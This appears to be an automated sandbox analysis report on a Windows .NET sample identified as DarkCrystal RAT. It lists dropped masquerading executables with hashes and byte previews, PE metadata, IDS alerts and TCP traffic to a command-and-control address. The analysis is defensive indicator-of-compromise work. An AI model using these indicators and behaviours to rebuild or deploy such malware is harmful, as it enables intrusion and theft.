                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.................\..........nz... ........@.. ....................................@................................. z..K....... ............................................................................ ............... ..H............text...tZ... ...\.................. ..`.rsrc... ............^..............@....reloc...............b..............@..B................Pz......H........... ....................y.......................................0..........(.... ........8........E........M...)...q...8....(.... ....~....{v...:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8z...*...0..)....... ........8........E................1...V.......8z.......~....(T...~....(X... ....<.... ....8.......... ....~....{....:....& ....8....~....:u... ....~....{|...9o...& ....8d...~....(L... .... .... ....s....~....(P....... ....~

                                                                                                            C:\Windows\ModemLogs\conhost.exe:Zone.Identifier

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:false
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):55
                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                            Malicious:false
                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                            C:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            File Type:MSVC .res
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1224
                                                                                                            Entropy (8bit):4.435108676655666
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                            MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                            SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                            SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                            SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                            Malicious:false
                                                                                                            Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                                            C:\Windows\System32\SecurityHealthSystray.exe

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4608
                                                                                                            Entropy (8bit):3.9253244418792326
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:6PJTPt+M7Jt8Bs3FJsdcV4MKe27pJvqBH2OulajfqXSfbNtm:2PdPc+Vx9MpJvkQcjRzNt
                                                                                                            MD5:BEDC18432D05E76192578C7FBC551109
                                                                                                            SHA1:7DEE5828B62D1A82B3ACA4E79FC58925B61CD6DC
                                                                                                            SHA-256:D374CB6D54FC7398D5C9702C6341F65073D55E25730CD8073A399A89112F3C93
                                                                                                            SHA-512:E8BDA1452D295D130BFD0BD05C79C40D5CA769A6E9AC92EB3CC594BCFE5631CFC255E4FC24182AB2070F4C9AB8BE39A2CEC90846055A6FDB7469C640DA180BBF
                                                                                                            Malicious:true
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-.2g.............................'... ...@....@.. ....................................@.................................4'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                                            C:\Windows\twain_32\04bb35a44deda9

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with very long lines (862), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):862
                                                                                                            Entropy (8bit):5.900632170468396
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:EZb9oRLd6OMT5wxjwH9jmMS6uafbS+02acjb:EZRoRRMT5Ksxm16b3P7
                                                                                                            MD5:08B36935CDF2F7DFB73E7094E895BAC8
                                                                                                            SHA1:E1672818F02B48FFAE314015C3B51071742008B9
                                                                                                            SHA-256:0B725E9E0F26A7211DCF56C8B6D8682F289554909F50299BA5732DDF9BA30E78
                                                                                                            SHA-512:B0CC63CB3BEC1438956200834035DC956590CA72E0504D422E760E8E42B68340E24A96EF495A293924485B0190EB0E724353B7234CDDF5DFD38F505AF4DD7D05
                                                                                                            Malicious:false
                                                                                                            Preview:cxUuLFywvsYLTmffZTKgQ7a5O51O5x40ff2NVxwCeahA6pDP0AeNwykfXZgPOj18yiqyuRJlhIB0Za9i2lX5TqEr5X06Rgx5jjLY9Pfi02qnwuF6a7XmL6oHe93XbNTAUGR0OkjnGyEaAa4KR3gUJKtm4E4AWIHnjpSqdOszXugW1NHDEsFhq81JWo5KqjR7qb1UHNrDLq6YnWvq605nCk6kxJUzShIydipZWw51ACW9Ccf92PN0nn5GfQg832uniH5EqVUK4DmAN6iVnU6DUSKznj4GP78IRsb4gbTg5D5kA42isLVi5qTP7FbHbN47FetefoyMBZIQXkztqVYDlZMkZM6a9LFrJ8efLXDDXJhgiC1WQraFz0VpSIFSrXMzUbHYFTiSSUqc2qCXUkKSv91SmzNDSuW97sLG5cR7JIxfK3xlFr8GM4DUjywQFfAh7qeJe5b1TNInMWItBl7kwQxDo1hGqA1oHPhdYoHJQGx9vaHMqCPdhZur3bemYVKSVef7zoVXeyUqcxRNtVZovYHse0k6Jev45eoR5KXCr19tEEPGJR3D5gh7Xwc9EYO9DZu7JARj8X63YXnalex1ls9Z7q4JsX7Tn9qpUR6J9UEhjoi9JBYklWXVaVAcGI0kanPYr8GTho2RnbzSH4Ar9XsRlUO8ReC1deH6YJRK5ED7dGr8frULIJkC58xWtHCClByIU247nzw5TvxfmQdjJ0sU4EBZW4bxCAVcSjnmxXiSXotKLRudod3uSeOQ1eksY83TZVNDm0wwSa6PV0OFK8IiHkJyVXuSwz4YvZuzEq0yqGc2h85AQfiZ0ULzLZsPFdAdfhd5GYBdHU2AIRQWcuBQQeibN5

                                                                                                            C:\Windows\twain_32\xKVBpkhCEjg.exe

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1991680
                                                                                                            Entropy (8bit):7.552871211185118
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:qhNLIZG9ZdCvfOqBlRF7kVkHreh1kEGD/5MTgsxjY9gIBiatkZ2hIHirkUP7oM8j:qGfj7rk+CLN9EIshijMX6i5w
                                                                                                            MD5:B379F4AC167609D8A3EF26444098B61D
                                                                                                            SHA1:85FE0BBBE666D72A955EE98444415194E00739EB
                                                                                                            SHA-256:430CBA76BB21F0FF671A5345C15A51BD047B0F5AECF764EF4668AE9085D22B80
                                                                                                            SHA-512:0028141132F1437FF556A00E7CD32298BF561690FD809F361FCFAF9B8837E5A173F4ACB192B25668550E2EC526EA4A518EA46E3FD7C2E1B8FAD1A49D8D6ED0FE
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.................\..........nz... ........@.. ....................................@................................. z..K....... ............................................................................ ............... ..H............text...tZ... ...\.................. ..`.rsrc... ............^..............@....reloc...............b..............@..B................Pz......H........... ....................y.......................................0..........(.... ........8........E........M...)...q...8....(.... ....~....{v...:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8z...*...0..)....... ........8........E................1...V.......8z.......~....(T...~....(X... ....<.... ....8.......... ....~....{....:....& ....8....~....:u... ....~....{|...9o...& ....8d...~....(L... .... .... ....s....~....(P....... ....~

                                                                                                            C:\Windows\twain_32\xKVBpkhCEjg.exe:Zone.Identifier

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:false
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                            \Device\Null

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\w32tm.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):151
                                                                                                            Entropy (8bit):4.904572590153658
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:VLV993J+miJWEoJ8FXbbQbaLy6voe1J8XKvj:Vx993DEUGQuSeX
                                                                                                            MD5:BADC94ED73BD9C12D8C7213C594F51FA
                                                                                                            SHA1:D805650669C5C39FC70CA3011485C6DDAAFE27FF
                                                                                                            SHA-256:7441B0A2D292A0F0CF5C58598F1C7302EFE62AAE7F202E4E2A29D7F1F929434C
                                                                                                            SHA-512:2D1DE9E300DFC39DA451625653A736F76857D0B80A4B1DC69D0AE6479B97C75DC0AC427C46F8B508F2C965D15D6AF3008078A12D3FD3BB65283333D24D0F36CE
                                                                                                            Malicious:false
                                                                                                            Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 11/11/2024 19:49:53..19:49:53, error: 0x80072746.19:49:58, error: 0x80072746.

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.552871211185118
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            File name:s5duotgoYD.exe
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5:b379f4ac167609d8a3ef26444098b61d
                                                                                                            SHA1:85fe0bbbe666d72a955ee98444415194e00739eb
                                                                                                            SHA256:430cba76bb21f0ff671a5345c15a51bd047b0f5aecf764ef4668ae9085d22b80
                                                                                                            SHA512:0028141132f1437ff556a00e7cd32298bf561690fd809f361fcfaf9b8837e5a173f4acb192b25668550e2ec526ea4a518ea46e3fd7c2e1b8fad1a49d8d6ed0fe
                                                                                                            SSDEEP:24576:qhNLIZG9ZdCvfOqBlRF7kVkHreh1kEGD/5MTgsxjY9gIBiatkZ2hIHirkUP7oM8j:qGfj7rk+CLN9EIshijMX6i5w
                                                                                                            TLSH:B995AE1A56924E3BC360177185AB503E52A5C7767A72FB0B350F24E1AC037B5CFB22A7
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.................\..........nz... ........@.. ....................................@................................

                                                                                                            File Icon

                                                                                                            Icon Hash:90cececece8e8eb0

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x5e7a6e
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x67261E11 [Sat Nov 2 12:41:53 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1e7a200x4b.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e80000x320.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1ea0000xc.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x20000x1e5a740x1e5c0082da0ca20ed00e21358815d7423be636False0.7825135502444673data7.556185144032018IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0x1e80000x3200x400287f78eaac50746e5d3d25653ee25feeFalse0.3525390625data2.651038093332615IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .reloc0x1ea0000xc0x200e891e37e2636106272d19c84a5f660b5False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_VERSION0x1e80580x2c8data0.46207865168539325

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            mscoree.dll_CorExeMain

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-11-12T00:42:17.538372+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973137.44.238.25080TCP
                                                                                                            2024-11-12T00:42:18.172405+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449730TCP
                                                                                                            2024-11-12T00:43:01.129789+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449791TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 12, 2024 00:42:16.871259928 CET4973180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:16.876254082 CET804973137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:16.876322985 CET4973180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:16.877166986 CET4973180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:16.882018089 CET804973137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:17.229152918 CET4973180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:17.234054089 CET804973137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:17.459933996 CET804973137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:17.538325071 CET804973137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:17.538343906 CET804973137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:17.538372040 CET4973180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:17.590909004 CET4973180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:17.597198963 CET804973137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:17.760874987 CET4973380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:17.764523983 CET804973137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:17.765181065 CET4973180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:17.767486095 CET804973337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:17.767875910 CET4973380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:17.767941952 CET4973380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:17.772572994 CET804973137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:17.774988890 CET804973337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:18.014419079 CET804973137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:18.119329929 CET4973380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:18.126405954 CET804973337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:18.126415014 CET804973337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:18.126424074 CET804973337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:18.197084904 CET4973180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:18.335958004 CET804973337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:18.407733917 CET804973337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:18.407833099 CET4973380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:18.579969883 CET4973380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:18.586882114 CET804973337.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:18.586966991 CET4973380192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:18.597011089 CET4973180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:18.605519056 CET804973137.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:18.605614901 CET4973180192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:18.663733006 CET4973580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:18.665643930 CET4973680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:18.670778036 CET804973537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:18.670861006 CET4973580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:18.670970917 CET4973580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:18.672425985 CET804973637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:18.672478914 CET4973680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:18.672691107 CET4973680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:18.678010941 CET804973537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:18.679613113 CET804973637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.025418997 CET4973580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:19.025933027 CET4973680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:19.032115936 CET804973537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.032126904 CET804973537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.032135963 CET804973637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.033723116 CET804973637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.033727884 CET804973637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.367254019 CET804973637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.367739916 CET804973537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.368865013 CET804973637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.368887901 CET804973537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.368918896 CET4973680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:19.368951082 CET804973637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.368959904 CET4973580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:19.368982077 CET804973537.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.368993044 CET4973680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:19.369021893 CET4973580192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:19.640134096 CET4973680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:19.641078949 CET4973880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:19.645423889 CET804973637.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.645611048 CET4973680192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:19.645840883 CET804973837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.649044037 CET4973880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:19.649044037 CET4973880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:19.653795004 CET804973837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:19.994110107 CET4973880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:20.000368118 CET804973837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:20.000391006 CET804973837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:20.000401020 CET804973837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:20.214418888 CET804973837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:20.291225910 CET804973837.44.238.250192.168.2.4
                                                                                                            Nov 12, 2024 00:42:20.291342020 CET4973880192.168.2.437.44.238.250
                                                                                                            Nov 12, 2024 00:42:20.560895920 CET4973880192.168.2.437.44.238.250
